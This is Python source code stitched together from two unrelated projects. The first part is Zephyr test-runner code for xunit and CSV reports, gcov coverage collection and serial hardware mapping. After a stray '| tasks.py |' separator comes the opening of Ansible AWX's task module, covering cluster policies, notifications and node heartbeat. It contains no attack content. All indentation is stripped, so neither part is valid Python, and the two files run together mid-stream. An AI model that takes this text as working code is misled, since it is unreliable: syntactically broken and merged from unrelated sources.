logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if not self.discards:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA"):
total = 0
if platform:
selected = [platform]
else:
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
logger.error(f"Unknown status {instance.status}")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSProperties = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSProperties, 'property', name="version", value=version)
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSProperties = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSProperties, 'property', name="version", value=version)
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
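# The handler.log parsed above is expected to contain a block framed by
# GCOV_COVERAGE_DUMP_START / GCOV_COVERAGE_DUMP_END in which each coverage line looks like
#   *<path to .gcda file><<hex dump of the gcda contents>
# (the leading "*" and the "<" separator are exactly what the splitting logic relies on;
# the path layout depends on the build). create_gcda_files() then writes the decoded bytes
# back out to those paths.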
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage, gcovr fails,
# hence skip it (problem only in gcovr v4.1)
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, items):
tuple_list = [(prefix, item) for item in items]
return [item for sublist in tuple_list for item in sublist]
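# e.g. _interleave_list("-e", ["foo/*", "bar/*"]) returns ["-e", "foo/*", "-e", "bar/*"],
# which is how exclude patterns and tracefiles are spliced into the gcovr command lines below.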
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform, pre_script, is_pty):
device = {
"serial": None,
"platform": platform,
"serial_pty": None,
"counter": 0,
"available": True,
"connected": True,
"pre_script": pre_script
}
if is_pty:
device['serial_pty'] = serial
else:
device['serial'] = serial
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
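# An entry in the hardware map, as consumed here, carries at least the keys used by
# scan_hw()/write_map()/dump() below; an illustrative, hand-written example (the
# authoritative schema is hwmap-schema.yaml):
#   - platform: frdm_k64f
#     id: "000123456789"
#     serial: /dev/ttyACM0
#     product: DAPLink CMSIS-DAP
#     runner: pyocd
#     connected: true
# load_hardware_map() additionally resets each entry's 'counter' field to 0.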
def scan_hw(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
self.detected.sort(key=lambda x: x['serial'] or '')
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product'] and not h['connected'] and not d.get('match', False):
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
tasks.py | # -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple
import errno
import functools
import importlib
import json
import logging
import os
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import subprocess
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError, ProgrammingError, connection
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
# Receptor
from receptorctl.socket_interface import ReceptorControl
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
from awx.main.queue import CallbackQueueDispatcher
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
)
from awx.main.utils.execution_environments import get_default_execution_environment, get_default_pod_spec
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
from rest_framework.exceptions import PermissionDenied
__all__ = [
'RunJob',
'RunSystemJob',
'RunProjectUpdate',
'RunInventoryUpdate',
'RunAdHocCommand',
'handle_work_error',
'handle_work_success',
'apply_cluster_membership_policies',
'update_inventory_computed_fields',
'update_host_smart_inventory_memberships',
'send_notifications',
'purge_old_stdout_files',
]
HIDDEN_PASSWORD = '**********'
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in a different format. \
'''
logger = logging.getLogger('awx.main.tasks')
class InvalidVirtualenvError(Exception):
def __init__(self, message):
self.message = message
def dispatch_startup():
startup_logger = logging.getLogger('awx.main.tasks')
startup_logger.debug("Syncing Schedules")
for sch in Schedule.objects.all():
try:
sch.update_computed_fields()
except Exception:
logger.exception("Failed to rebuild schedule {}.".format(sch))
#
# When the dispatcher starts, if the instance cannot be found in the database,
# automatically register it. This is mostly useful for openshift-based
# deployments where:
#
# 2 Instances come online
# Instance B encounters a network blip, Instance A notices, and
# deprovisions it
# Instance B's connectivity is restored, the dispatcher starts, and it
# re-registers itself
#
# In traditional container-less deployments, instances don't get
# deprovisioned when they miss their heartbeat, so this code is mostly a
# no-op.
#
apply_cluster_membership_policies()
cluster_node_heartbeat()
Metrics().clear_values()
# Update Tower's rsyslog.conf file based on logging settings in the db
reconfigure_rsyslog()
def inform_cluster_of_shutdown():
try:
this_inst = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
this_inst.capacity = 0 # No thank you to new jobs while shut down
this_inst.save(update_fields=['capacity', 'modified'])
try:
reaper.reap(this_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(this_inst.hostname))
logger.warning('Normal shutdown signal for instance {}, ' 'removed self from capacity pool.'.format(this_inst.hostname))
except Exception:
logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
started_waiting = time.time()
with advisory_lock('cluster_policy_lock', wait=True):
lock_time = time.time() - started_waiting
if lock_time > 1.0:
to_log = logger.info
else:
to_log = logger.debug
to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
started_compute = time.time()
all_instances = list(Instance.objects.order_by('id'))
all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
total_instances = len(all_instances)
actual_groups = []
actual_instances = []
Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
Node = namedtuple('Instance', ['obj', 'groups'])
# Process the policy instance list first; these entries represent manually managed memberships
instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
for ig in all_groups:
group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()]) # obtained in prefetch
for hostname in ig.policy_instance_list:
if hostname not in instance_hostnames_map:
logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
continue
inst = instance_hostnames_map[hostname]
group_actual.instances.append(inst.id)
# NOTE: arguable behavior: policy-list-group is not added to
# instance's group count for consideration in minimum-policy rules
if group_actual.instances:
logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
actual_groups.append(group_actual)
# Process Instance minimum policies next, since they represent a concrete lower bound on the
# number of instances to make available to instance groups
actual_instances = [Node(obj=i, groups=[]) for i in all_instances if i.managed_by_policy]
logger.debug("Total instances: {}, available for policy: {}".format(total_instances, len(actual_instances)))
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_min_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if len(g.instances) >= g.obj.policy_instance_minimum:
break
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via the policy list
continue
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_min_added.append(i.obj.id)
if policy_min_added:
logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
# Finally, process instance policy percentages
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_per_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via a minimum policy or policy list
continue
if 100 * float(len(g.instances)) / len(actual_instances) >= g.obj.policy_instance_percentage:
break
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_per_added.append(i.obj.id)
if policy_per_added:
logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
# Determine if any changes need to be made
needs_change = False
for g in actual_groups:
if set(g.instances) != set(g.prior_instances):
needs_change = True
break
if not needs_change:
logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
return
# On a differential basis, apply instances to groups
with transaction.atomic():
for g in actual_groups:
if g.obj.is_container_group:
logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
continue
instances_to_add = set(g.instances) - set(g.prior_instances)
instances_to_remove = set(g.prior_instances) - set(g.instances)
if instances_to_add:
logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
g.obj.instances.add(*instances_to_add)
if instances_to_remove:
logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
g.obj.instances.remove(*instances_to_remove)
logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
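# Illustrative sketch of the three passes above, using hypothetical data that
# is not taken from this codebase: with two policy-managed instances A and B,
# a group with policy_instance_minimum=1 picks up the least-loaded instance
# (A), and a group with policy_instance_percentage=100 then accumulates
# instances until it holds 100% of the policy-managed pool ([B, A]). Only
# groups whose final membership differs from prior_instances are written
# back, inside a single transaction.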
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
orig_len = len(setting_keys)
for i in range(orig_len):
for dependent_key in settings_registry.get_dependent_settings(setting_keys[i]):
setting_keys.append(dependent_key)
cache_keys = set(setting_keys)
logger.debug('cache delete_many(%r)', cache_keys)
cache.delete_many(cache_keys)
if any([setting.startswith('LOG_AGGREGATOR') for setting in setting_keys]):
reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
# TODO: possibly implement some retry logic
lock_file = project_path + '.lock'
if os.path.exists(project_path):
try:
shutil.rmtree(project_path)
logger.debug('Success removing project files {}'.format(project_path))
except Exception:
logger.exception('Could not remove project directory {}'.format(project_path))
if os.path.exists(lock_file):
try:
os.remove(lock_file)
logger.debug('Success removing {}'.format(lock_file))
except Exception:
logger.exception('Could not remove lock file {}'.format(lock_file))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
if threshold <= 0:
cache.delete('awx-profile-sql-threshold')
logger.error('SQL PROFILING DISABLED')
else:
cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
if not isinstance(notification_list, list):
raise TypeError("notification_list should be of type list")
if job_id is not None:
job_actual = UnifiedJob.objects.get(id=job_id)
notifications = Notification.objects.filter(id__in=notification_list)
if job_id is not None:
job_actual.notifications.add(*notifications)
for notification in notifications:
update_fields = ['status', 'notifications_sent']
try:
sent = notification.notification_template.send(notification.subject, notification.body)
notification.status = "successful"
notification.notifications_sent = sent
if job_id is not None:
job_actual.log_lifecycle("notifications_sent")
except Exception as e:
logger.exception("Send Notification Failed {}".format(e))
notification.status = "failed"
notification.error = smart_str(e)
update_fields.append('error')
finally:
try:
notification.save(update_fields=update_fields)
except Exception:
logger.exception('Error saving notification {} result.'.format(notification.id))
@task(queue=get_local_queuename)
def gather_analytics():
from awx.conf.models import Setting
from rest_framework.fields import DateTimeField
last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
last_time = DateTimeField().to_internal_value(last_gather.value) if last_gather and last_gather.value else None
gather_time = now()
if not last_time or ((gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL):
analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
nowtime = time.time()
for f in os.listdir(settings.JOBOUTPUT_ROOT):
if os.path.getctime(os.path.join(settings.JOBOUTPUT_ROOT, f)) < nowtime - settings.LOCAL_STDOUT_EXPIRE_TIME:
os.unlink(os.path.join(settings.JOBOUTPUT_ROOT, f))
logger.debug("Removing {}".format(os.path.join(settings.JOBOUTPUT_ROOT, f)))
@task(queue=get_local_queuename)
def cleanup_execution_environment_images():
if settings.IS_K8S:
return
process = subprocess.run('podman images --filter="dangling=true" --format json'.split(" "), capture_output=True)
if process.returncode != 0:
logger.debug("Cleanup execution environment images: could not get list of images")
return
if len(process.stdout) > 0:
images_system = json.loads(process.stdout)
for e in images_system:
image_name = e["Id"]
logger.debug(f"Cleanup execution environment images: deleting {image_name}")
process = subprocess.run(['podman', 'rmi', image_name, '-f'], stdout=subprocess.DEVNULL)
if process.returncode != 0:
logger.debug(f"Failed to delete image {image_name}")
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
logger.debug("Cluster node heartbeat task.")
nowtime = now()
instance_list = list(Instance.objects.all())
this_inst = None
lost_instances = []
(changed, instance) = Instance.objects.get_or_register()
if changed:
logger.info("Registered tower node '{}'".format(instance.hostname))
for inst in list(instance_list):
if inst.hostname == settings.CLUSTER_HOST_ID:
this_inst = inst
instance_list.remove(inst)
elif inst.is_lost(ref_time=nowtime):
lost_instances.append(inst)
instance_list.remove(inst)
if this_inst:
startup_event = this_inst.is_lost(ref_time=nowtime)
this_inst.refresh_capacity()
if startup_event:
logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
return
else:
raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
# IFF any node has a greater version than we do, then we'll shut down services
for other_inst in instance_list:
if other_inst.version == "":
continue
